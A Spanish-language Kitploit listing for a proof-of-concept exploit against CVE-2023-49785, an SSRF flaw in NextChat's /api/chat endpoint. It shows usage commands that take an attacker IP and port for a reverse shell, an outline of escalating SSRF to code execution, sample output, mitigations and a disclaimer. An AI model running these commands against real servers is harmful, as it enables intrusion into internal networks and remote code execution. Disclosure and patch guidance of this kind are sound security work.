Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
NextChat_SSRF_CVE-2023-49785 — Prueba de concepto de exploit para CVE-2023-49785, una vulnerabilidad de Server-Side Request Forgery (SSRF) en NextChat, que permite solicitudes no autorizadas a la red interna. | Kitploit
Herramientas/GitHubGitHub/hyunnna/nextchat_ssrf_cve-2023-49785
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubhyunnna/nextchat_ssrf_cve-2023-49785

NextChat_SSRF_CVE-2023-49785

Prueba de concepto de exploit para CVE-2023-49785, una vulnerabilidad de Server-Side Request Forgery (SSRF) en NextChat, que permite solicitudes no autorizadas a la red interna.

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

NextChat_SSRF_CVE-2023-49785

root@kitploit:~
# Exploit para CVE-2023-49785
# NextChat SSRF a RCE
# Uso: python3 exploit.py <objetivo> <tu_ip> <tu_puerto> [--proxy PROXY] [--only-ssrf] [--verbose]

📌 Descripción

Este exploit aprovecha CVE-2023-49785, una vulnerabilidad de Server-Side Request Forgery (SSRF) en NextChat (ChatGPT-Next-Web) que permite a un atacante no autenticado enviar solicitudes HTTP arbitrarias desde el servidor mediante el parámetro icon del punto final /api/chat. Bajo ciertas condiciones, esto puede derivar en ejecución remota de código (RCE) mediante el acceso a servicios internos, cabeceras de metadatos o endpoints de administración.

🚀 Características

  • 🎯 Explotación de SSRF en el punto final /api/chat
  • 🔥 Escalada a RCE mediante acceso a servicios internos
  • 🌐 Soporte para IPv4 e IPv6
  • 🖥️ Modo --only-ssrf para pruebas de validación
  • 🔁 Bypass de restricciones de URL mediante redirecciones
  • 🧪 Incluye payloads de prueba para servicios internos comunes
  • 🔍 Salida detallada con --verbose
  • 📋 Requisitos

    root@kitploit:~
    pip install requests
    

    🛠️ Uso

    Validación básica de SSRF

    root@kitploit:~
    python3 exploit.py http://objetivo.local 10.10.14.5 4444 --only-ssrf
    

    Explotación completa (SSRF + RCE a través de servicio interno)

    root@kitploit:~
    python3 exploit.py http://objetivo.local 10.10.14.5 4444 --verbose
    

    Con proxy

    root@kitploit:~
    python3 exploit.py http://objetivo.local 10.10.14.5 4444 --proxy http://127.0.0.1:8080
    

    Ejemplo con HTTPS

    root@kitploit:~
    python3 exploit.py https://chat.ejemplo.com 10.10.14.5 4444
    

    ⚙️ Parámetros

    ParámetroDescripción
    objetivoURL del NextChat vulnerable (ej. http://chat.ejemplo.com)
    tu_ipTu IP para el reverse shell
    tu_puertoTu puerto para el reverse shell
    --proxy PROXYProxy a utilizar (ej. http://127.0.0.1:8080)
    --only-ssrfEjecutar únicamente la validación de SSRF (sin RCE)
    --verboseMostrar salida detallada con las respuestas de las solicitudes

    🧠 Cómo funciona

    1. SSRF: Se inyecta una URL maliciosa en el parámetro icon de la solicitud a /api/chat. El servidor procesa esta URL y realiza la solicitud en nombre del atacante.
    2. Detección de servicios internos: El exploit intenta acceder a servicios internos comunes (p. ej., http://127.0.0.1:8080) para identificar endpoints vulnerables.
    3. RCE: Al llegar a un servicio interno que permita ejecución de comandos (o mediante el abuso de otros endpoints), se lanza un reverse shell hacia tu_ip:tu_puerto.

    📄 Ejemplo de salida

    root@kitploit:~
    $ python3 exploit.py http://chat.ejemplo.com 10.10.14.5 4444 --only-ssrf
    
    [+] Objetivo: http://chat.ejemplo.com
    [+] Probando respuesta del objetivo...
    [+] El objetivo está activo
    [+] Enviando payload SSRF a http://chat.ejemplo.com/api/chat
    [+] Estado de la respuesta: 200
    [+] Posible SSRF detectado: la respuesta incluye datos del servicio interno.
    [+] Prueba completada. El objetivo es vulnerable a SSRF.
    

    🩹 Mitigación

    • Actualizar NextChat a una versión parcheada (>= 2.12.4).
    • No exponer NextChat directamente a Internet sin un proxy inverso que filtre rutas sensibles.
    • Validar y restringir las URL permitidas en el parámetro icon.
    • Segmentar la red para evitar el acceso a servicios internos desde la aplicación.

    ⚠️ Aviso legal

    Este exploit se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El uso indebido de esta herramienta contra sistemas sin permiso explícito puede ser ilegal. El autor no se hace responsable del mal uso de la misma.

    📚 Referencias

    • CVE-2023-49785 - NVD
    • NextChat (ChatGPT-Next-Web)
    Descargar herramienta